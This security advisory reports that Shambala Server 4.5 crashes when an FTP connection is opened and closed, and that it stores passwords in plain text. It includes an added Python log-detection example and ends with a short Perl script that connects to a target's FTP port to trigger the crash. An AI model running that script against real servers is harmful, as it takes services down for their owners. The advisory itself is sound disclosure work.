Subject: DoS in Shambala Server 4.5
Platforms: Microsoft Windows 9x, Windows NT and Windows 2000
Risk Level: High
Author: zillion
Vendor: Evolvable Corporation
Vendor status: Notified 4 weeks ago. The problem will be fixed in a next release
Subject:
=========
Shambala Server 4.5 denial of service attack.
Overview:
==========
Shambala is a low cost, multi-featured FTP and Web server distributed by
Evolvable Corporation. It is used by numerous amateur and small office/home
webmasters as an economical way to launch and manage a website.
A problem with Shambala's mishandling of connections and disconnections would
potentially enable a (simple) denial-of-service attack. A second observation
is Shambala's storage of passwords in-the-clear on the server: a major problem
on Windows 95 and 98 platforms.
Product details:
=================
Vendor's blurb: "Shambala is an easy to use communications server
featuring the ability to serve and access web sites, ftp sites, and
chat rooms. Using Shambala, you can quickly create a web site and host
it from any PC. Shambala doesn't require NT and its installation is
non-invasive."
Technical description:
======================
Shambala does not handle all connections correctly. It is therefore
possible to remotely crash the ftp server using a custom script which
automates the action of opening and closing a connection to and from the
server. The server crashes upon disconnection and gives the following error:
    Run-time error `20127`
    invalid ConnectionID
A second problem is that Shambala stores all passwords in plain text on
the server:
    c:\program files\shambala\passwords.txt (in our case)
This is not such a big deal on an NT server as permissions could be set to
deny access to this file. Because the server is also shipped for Windows 95
and Windows 98 it could be possible for any user to gain access to the file.
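
An added example, not part of the original advisory or of the vendor's software: one way to spot the connect-then-disconnect pattern described above in FTP connection logs. The log format, the sample lines and the function names are constructed for illustration; this advisory does not show Shambala's real log format.

```python
# Added example (not from the advisory). The log format below is constructed
# for illustration and is not Shambala's own.
from collections import Counter
from datetime import datetime

SAMPLE_LOG = """\
2000-10-09 14:01:40 192.0.2.10 id=16 CONNECT
2000-10-09 14:01:41 192.0.2.10 id=16 USER anonymous
2000-10-09 14:01:55 192.0.2.10 id=16 DISCONNECT
2000-10-09 14:02:11 198.51.100.7 id=17 CONNECT
2000-10-09 14:02:11 198.51.100.7 id=17 DISCONNECT
2000-10-09 14:02:12 198.51.100.7 id=18 CONNECT
"""

def parse(line):
    """Split one constructed log line into (timestamp, source, conn id, verb)."""
    date, clock, src, conn, rest = line.split(maxsplit=4)
    ts = datetime.strptime(f"{date} {clock}", "%Y-%m-%d %H:%M:%S")
    return ts, src, conn, rest.split()[0]

def commandless_sessions(log_text):
    """Return (source, conn id, opened, closed) for sessions with no FTP command.

    closed is None when the log ends before a DISCONNECT is recorded, which is
    what a server dying on disconnect could leave behind (assumption).
    """
    open_sessions = {}   # conn id -> [source, opened, saw_command]
    findings = []
    for line in filter(str.strip, log_text.splitlines()):
        ts, src, conn, verb = parse(line)
        if verb == "CONNECT":
            open_sessions[conn] = [src, ts, False]
        elif conn not in open_sessions:
            continue                       # event for a session never seen opening
        elif verb == "DISCONNECT":
            source, opened, saw_command = open_sessions.pop(conn)
            if not saw_command:
                findings.append((source, conn, opened, ts))
        else:
            open_sessions[conn][2] = True  # any other verb counts as a command
    for conn, (source, opened, saw_command) in open_sessions.items():
        if not saw_command:
            findings.append((source, conn, opened, None))
    return findings

def by_source(findings):
    """Count command-less sessions per source address."""
    return Counter(source for source, _, _, _ in findings)

if __name__ == "__main__":
    for source, conn, opened, closed in commandless_sessions(SAMPLE_LOG):
        print(source, conn, opened, closed or "no disconnect logged")
```
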
Recommendations:
================
It is recommended to disable the daemon until a fixed package is released.
Vendor links:
==========
http://www.evolvable.com/
http://www.evolvable.com/estore/product.asp?sku=1
Contact info:
=============
Shambala creator: [email protected]
Bug founder:[email protected]
http://www.safemode.org
Greets:
========
Shoutz to #hackerzlair Edgemaster, The_Wizz (pintje?),
Munge, Acos, Dirk, RFP, George and all the s-mode members (what's left
of it ;).
---cut-here---
#!/usr/bin/perl
#
# This tool (tool not exploit!) crashes Shambala Server 4.5
# This is a stripped version of Guido Bakkers exploit code (thanks)
#
use Getopt::Std;
use IO::Socket;

getopts('s:', \%args);
&usage if !defined($args{s});

$serv = $args{s};
$EOL  = "\015\012";

$remote = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $args{s},
    PeerPort => "ftp(21)",
) || die("Unable to connect to ftp port at $args{s}\n");
$remote->autoflush(1);

print "Done...\n";
exit; # remove this and the server will *NOT* crash

sub usage { die("\n$0 -s ipaddress\n\n"); }
---cut-here---
***********************************************************************************
This advisory was created by zillion (at) safemode.org with the aim of
promoting secure computing and to warn users of potential holes in networks
and systems. Safemode is not responsible for any malicious, illegal or
otherwise antisocial action taken with the information revealed in this
advisory. Permission is granted for copying and circulating this advisory to
the Internet community for the purpose of alerting them to problems, if and
only if, the advisory is not edited or changed in any way, and is attributed
to Safemode. (with other words: don't blame me ;)
***********************************************************************************